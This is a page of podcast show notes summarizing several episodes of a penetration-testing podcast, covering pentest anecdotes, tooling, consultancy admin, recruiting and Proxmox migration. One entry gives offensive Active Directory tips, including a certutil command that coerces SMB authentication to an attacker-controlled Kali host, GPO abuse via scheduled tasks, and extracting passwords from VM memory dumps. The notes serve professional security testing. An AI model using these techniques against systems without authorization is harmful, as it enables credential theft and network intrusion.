7MS #653: How to Succeed in Business Without Really Crying – Part 20

Hi, today’s tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer “crops” to a domain admin’s desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login

26 Heinä 202432min

Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus!  It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files include: docusaurus.config.js – for setting the site title and key config settings sidebars.js – used to create/edit navigation bar menus /src/css/custom.css – to style the site

19 Heinä 202414min

Today’s tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs!  Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address.  When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I’m not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s).  If you’re on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you’ve got the vmss2core utility, which I couldn’t find anywhere except the Internet Archive.  Then I really like to follow this article to pull passwords from VM memory dumps. Can’t RDP into a victim system that you’re PSRemote’d into?  Maybe RDP is listening on an alternate port!  Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber` And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

12 Heinä 202448min

Hi friends, today’s a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud’homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares Snaffler – finds all the interesting SMB shares and juicy file contents Efflanrs – takes the raw Snaffler log and turns it into an interactive Web app! RubeusToCcache – a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .ccache files for Impacket

7 Heinä 202415min

Today I recap a two week persona/biz road trip and talk about the security stuff that got sprinkled into it, including: Family members who don’t care about their personal security Weakpass – a cool collection of word lists for brute-forcing and spraying that I’d never heard of Working on two security Webinars for Netwrix (here’s part 1: Mastering Password Security & Active Directory Monitoring, and and part 2: Advanced Strategies for SQL Server Protection & Sensitive Information Security) The moment we though our credit card was stolen at a waterpark A shameless plug for our fun interview with Stu the recruiter Some internal pentest tips that have given us some gold in recent assessments Super fast, spoiler-free movie reviews of Roadhouse, Arcadian, Late Night with the Devil and The Coffee Table

1 Heinä 202445min

Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions: How do you properly vet a recruiter you don’t know, but who offers a job opportunity you’re interested in? What questions should you ask a potential recruiter to get a feel for their level of experience in the industry (hint, if a recruiter doesn’t even have a LinkedIn page, that’s probably a red flag) Resume tips: Finding the right length and tone Tailoring your resume for each individual job Highlighting your strengths Do people still use cover letters when applying to a gig? Is a “hobbies and interests” section still a good idea on a resume (to show them you’re not a robot who works 24/7)? Lets talk about some horror and/or success stories from the world of recruiting!

24 Kesä 202446min

Hey friends, today we talk about some not-so-glamorous but ever-so-important stuff related to running a cybersecurity consultancy, including: Taking an inventory of all the SaaS stuff your business uses – to keep an eye on spending, know when services are expiring, and track which credit card the services are tied to (so the services don’t almost get cancelled like some did with me!) Tracking domain names, and setting up your own automated rules to notify you well ahead of time when a domain is expiring (maybe that passion project is never gonna happen…time to let those old domains go 🙂 Making a spreadsheet of all important accounts and checking all the auth methods allowed for each account – to prevent attacks such as SIM-swapping

14 Kesä 20249min

Hey friends, today we continue our series all about migrating from VMWare to the world Proxmox!  Specifically: Getting my first Proxmox-based NUCs out in the field for live engagements! Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to to add Proxmox to those bare-metals with a simple wizard. I couldn’t figure out how to get a Proxmox VM as the main firewall for the whole Proxmox node, but it turns out it helps to RTFM. When getting a bare-metal OS/hypervisor installed, be careful in that the provider may leave the management ports of that host open to the whole world.  In OVH’s case, they have a software firewall that can be tuned so that, for example, only you can hit the management ports for the box. Getting VLANs setup is a snap once the virtual hardware stuff is in place.

10 Kesä 202435min